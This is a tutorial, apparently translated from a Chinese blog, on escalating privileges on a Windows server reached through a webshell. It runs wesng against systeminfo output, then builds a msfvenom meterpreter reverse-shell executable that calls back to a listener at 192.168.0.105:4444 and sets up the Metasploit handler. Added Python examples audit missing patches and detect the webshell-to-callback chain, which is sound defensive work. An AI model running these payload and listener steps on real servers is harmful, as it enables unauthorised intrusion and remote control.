Privilege Escalation: Overflow Vulnerability. (Ordinary privilege escalation to administrator privileges.)

Escalation of Privilege: Overflow Vulnerability

Privilege escalation (also called elevation of privilege) means raising the permissions of an account we already control. Because the operating system is a multi-user system, it enforces permission controls on users. For example, the permissions obtained through a web vulnerability are those of the web process, and web services are usually started under an account with very low permissions. Some operations performed through the webshell are therefore restricted, which is why they need to be elevated to administrator or even SYSTEM privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations, or through vulnerabilities in third-party software and services such as database or FTP servers.


Table of contents:

Escalation of Privilege: Overflow Vulnerability

Windows common commands:

Escalation of privileges from the web environment:

Step 1: Escalation of rights means that we already have a Trojan horse or another way to reach the directory of the web site.

Step 2: Enter the terminal, print the system information and save it to a file.

Step 3: Find this file in the directory and download it to our computer.

Step 4: Download the overflow vulnerability tool. (wesng-master)

Step 5: Unzip the file and put the system information file we just downloaded into wesng-master.

Step 6: Open the command line and switch to the directory where the overflow vulnerability tool was just downloaded. (wesng-master)

Step 7: Run the search for overflow vulnerabilities.

Step 8: Open the file in which we saved the vulnerabilities. (vuln1.csv)

Step 9: Search for the vulnerability number directly on the Internet and use it. (It is recommended to use msf for privilege escalation.)

Step 10: Generate a background program (Trojan horse).

Step 11: Upload the newly generated program to the server to be elevated.

Step 12: Install msf directly on our server. (I have msf in kali directly for testing here.)

Step 13: Execute the program on the Windows system; the session connects back to our server (kali).

Step 14: Check the current privileges. (Are they high privileges?)

Step 15: Search for the vulnerability number on the Internet and use it. (Return to this environment and use the vulnerability to escalate.)


Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.


Windows common commands:

systeminfo                    //print system information
whoami                        //get the current user name
whoami /priv                  //privileges of the current account
ipconfig                      //network configuration
ipconfig /displaydns          //show the DNS cache
route print                   //print the routing table
arp -a                        //print the ARP table
hostname                      //host name
net user                      //list users
net user UserName             //information about a user
net use \\SMBPATH Pa$$wOrd /u:UserName       //connect to an SMB share
net localgroup                //list all groups
net localgroup GROUP          //information about the specified group
net view \\127.0.0.1          //sessions opened to the current computer
net session                   //sessions open with other machines
netsh firewall show config    //show the firewall configuration
DRIVERQUERY                   //list installed drivers
tasklist /svc                 //list tasks with their services
net start                     //list started services
dir /s foo                    //search the directory tree for items containing the given string
sc query                      //list all services
sc qc ServiceName             //find the path of the specified service
shutdown /r /t 0              //reboot immediately
type file.txt                 //print the file contents
icacls "C:\Example"           //list permissions
wmic qfe get Caption,Description,HotFixID,InstalledOn   //list installed patches

Escalation of privilege: overflow vulnerability.

Escalation of privileges from the web environment:

Step 1: Escalation of rights means that we already have a Trojan horse or another way to reach the directory of the web site. (Usually a one-line webshell.)


Step 2: Enter the terminal, print the system information and save it to a file.

systeminfo > systeminfo.txt


Step 3: Find this file in the directory and download it to our computer. (Usually it is in the directory where we entered the command.)


Step 4: Download the overflow vulnerability tool. ( wesng-master )

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation


Step 5: Unzip the file and put the system information file we just downloaded into wesng-master.


Step 6: Open the command line and switch to the directory where the overflow vulnerability tool was just downloaded. (wesng-master)


Step 7: Run the search for overflow vulnerabilities.

python wes.py systeminfo.txt -o vuln1.csv

python            //run with python
wes.py            //the tool script
systeminfo.txt    //the file we just downloaded from the server
-o vuln1.csv      //save the result to the file vuln1.csv
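What wes.py does with this file is read the OS build and the installed hotfix list out of the systeminfo output and compare them against its database of known patches. The following added example (not part of the original post, and not wesng's code) shows the defender-side half of that check: parsing the same systeminfo format and reporting the build number and any hotfixes missing from a required patch baseline. The sample systeminfo text, the host name and the KB identifiers are constructed placeholders, not values from a real machine.

```python
"""Parse `systeminfo` output (the same file wes.py consumes) and report the
OS build plus which required hotfixes are missing. Defender-side patch audit;
added example, not the wesng project's code."""
import re
from typing import Dict, List, Optional, Set

# Constructed sample of English-locale `systeminfo` output. Host name, build
# and KB numbers are placeholders, not taken from a real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4000001
                           [02]: KB4000002
                           [03]: KB4000003
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed baseline of hotfixes the defender requires on this host class.
REQUIRED_KBS = {"KB4000001", "KB4000003", "KB4000009"}

# "Field:   value" lines we care about, and the indented "[NN]: KBxxxxxx" lines
# that follow the "Hotfix(s):" header.
FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s+(.+?)\s*$")
HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.IGNORECASE)
FIELD_KEYS = {"OS Name": "os_name", "OS Version": "os_version", "System Type": "arch"}


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract OS name, version string, architecture and installed KB list."""
    info: Dict[str, object] = {"os_name": None, "os_version": None,
                               "arch": None, "hotfixes": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            info[FIELD_KEYS[m.group(1)]] = m.group(2)
            continue
        h = HOTFIX_RE.match(line)
        if h:
            info["hotfixes"].append(h.group(1).upper())  # type: ignore[union-attr]
    return info


def build_number(os_version: Optional[str]) -> int:
    """Pull the numeric build out of e.g. '6.3.9600 N/A Build 9600'; 0 if absent."""
    m = re.search(r"Build\s+(\d+)", os_version or "")
    return int(m.group(1)) if m else 0


def missing_hotfixes(info: Dict[str, object], required: Set[str]) -> List[str]:
    """Required KBs that do not appear in the installed list, sorted."""
    installed = set(info["hotfixes"])  # type: ignore[arg-type]
    return sorted(required - installed)


def audit(text: str = SAMPLE_SYSTEMINFO, required: Set[str] = REQUIRED_KBS) -> Dict[str, object]:
    """Run the whole check and return a small report dict."""
    info = parse_systeminfo(text)
    return {
        "os_name": info["os_name"],
        "build": build_number(info["os_version"]),  # type: ignore[arg-type]
        "installed": len(info["hotfixes"]),  # type: ignore[arg-type]
        "missing": missing_hotfixes(info, required),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On a real host you would pipe `systeminfo > systeminfo.txt` into `audit()` and maintain `REQUIRED_KBS` from your own patch-management baseline; a non-empty `missing` list is exactly the condition wes.py turns into exploit suggestions, so it is the condition to remediate first.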


Step 8: Open the file in which we saved the vulnerabilities. (vuln1.csv)


Step 9: Search for the vulnerability number directly on the Internet and use it. (It is recommended to use msf for privilege escalation.)


Step 10: Generate a background program (Trojan horse).

Background program (Trojan): https://tianyuk.blog.csdn.net/article/details/123541093

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f exe > bgxg.exe

// lhost = kali's IP address
// lport = port number (for example 4444)
// -f exe > filename.exe


Step 11: Upload the newly generated program to the server to be elevated.


Step 12: Install msf directly on our server. (I have msf in kali directly for testing here.) (The two servers must be able to communicate.)

msfconsole            //start the msf console

use exploit/multi/handler        //load the handler module

set payload windows/meterpreter/reverse_tcp
// payload command (the windows/meterpreter/reverse_tcp set here must match the one used to generate the program)

set lhost 192.168.0.105
// set the local listening IP (kali's IP); it must match the IP used in the program

set LPORT 4444
// set the local listening port (kali's port); it must match the port used in the program

run                //execute


Step 13: Execute the program on the Windows system; the session connects back to our server (kali).
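Seen from the defender's side, Steps 10 to 13 leave a very recognisable trace: the web server worker spawns a process (Step 2's `systeminfo`, and later the uploaded program), the uploaded program runs from the web content directory, and it then opens an outbound TCP connection to the listener. The following added example (not part of the original post) shows detection logic for that chain over constructed events in the shape of Sysmon Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect). The event records, GUIDs and web-root paths are constructed; the file name, IP and port reuse the values the post itself uses.

```python
"""Flag the web-shell-to-callback chain: a web server worker spawning a
process, an executable running out of the web root, and that executable
initiating an outbound connection. Added example; events are constructed
in Sysmon ID 1 / ID 3 shape, not real logs."""
import ntpath
from typing import Dict, List, Tuple

# Process names of common web server workers (assumed list, extend per site).
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe", "tomcat9.exe"}
# Web content directories on this host (constructed; lower-case, trailing slash).
WEB_ROOTS = ("c:\\inetpub\\wwwroot\\", "c:\\phpstudy\\www\\")

Alert = Tuple[str, str, str]  # (ProcessGuid, rule name, detail)

# Constructed sample events. {A1}/{A2} reproduce Steps 2 and 10-13 of the post;
# {B1} is a benign interactive process for contrast.
EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "ProcessGuid": "{A1}",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "CommandLine": "cmd.exe /c systeminfo > systeminfo.txt"},
    {"EventID": 1, "ProcessGuid": "{A2}",
     "Image": "C:\\inetpub\\wwwroot\\uploads\\bgxg.exe",
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "CommandLine": "bgxg.exe"},
    {"EventID": 3, "ProcessGuid": "{A2}",
     "Image": "C:\\inetpub\\wwwroot\\uploads\\bgxg.exe",
     "DestinationIp": "192.168.0.105", "DestinationPort": 4444, "Initiated": True},
    {"EventID": 1, "ProcessGuid": "{B1}",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 3, "ProcessGuid": "{B1}",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 443, "Initiated": True},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of host OS."""
    return ntpath.basename(path).lower()


def _under_webroot(path: str) -> bool:
    return path.lower().startswith(WEB_ROOTS)


def detect(events: List[Dict[str, object]]) -> List[Alert]:
    """Run the three rules over an event stream and return the alerts raised."""
    alerts: List[Alert] = []
    webroot_procs = set()  # GUIDs of processes whose image lives in the web root
    for ev in events:
        guid = str(ev["ProcessGuid"])
        if ev["EventID"] == 1:
            parent = _base(str(ev["ParentImage"]))
            # Rule 1: a web server worker should not be spawning child processes.
            if parent in WEB_WORKERS:
                alerts.append((guid, "web_worker_child",
                               f"{parent} spawned {ev['CommandLine']}"))
            # Rule 2: executables should not run from the web content directory.
            if _under_webroot(str(ev["Image"])):
                webroot_procs.add(guid)
                alerts.append((guid, "webroot_binary", str(ev["Image"])))
        elif ev["EventID"] == 3 and ev.get("Initiated"):
            # Rule 3: a web-root executable initiating an outbound connection
            # is the callback to the listener (Step 13).
            if guid in webroot_procs or _under_webroot(str(ev["Image"])):
                alerts.append((guid, "webroot_outbound",
                               f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
    return alerts


if __name__ == "__main__":
    for guid, rule, detail in detect(EVENTS):
        print(f"{guid} {rule}: {detail}")
```

Rule 1 alone already catches the webshell's command execution in Step 2; rules 2 and 3 together give high confidence, because a legitimate web application has no reason to execute a binary from its upload directory that then dials out. Mitigation follows the same lines: deny execute on the web content directories, run the worker under a low-privilege account and egress-filter the web tier so the callback in Step 13 fails.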


Step 14: Check the current privileges. (Are they high privileges?) If not, search for the vulnerability number directly on the Internet and use it. (It is recommended to use msf to escalate privileges.)

getuid                //show the user the session is running as


Step 15: Search for the vulnerability number on the Internet and use it. (Return to this environment and use the vulnerability to escalate.)

Origin blog.csdn.net/weixin_54977781/article/details/130352355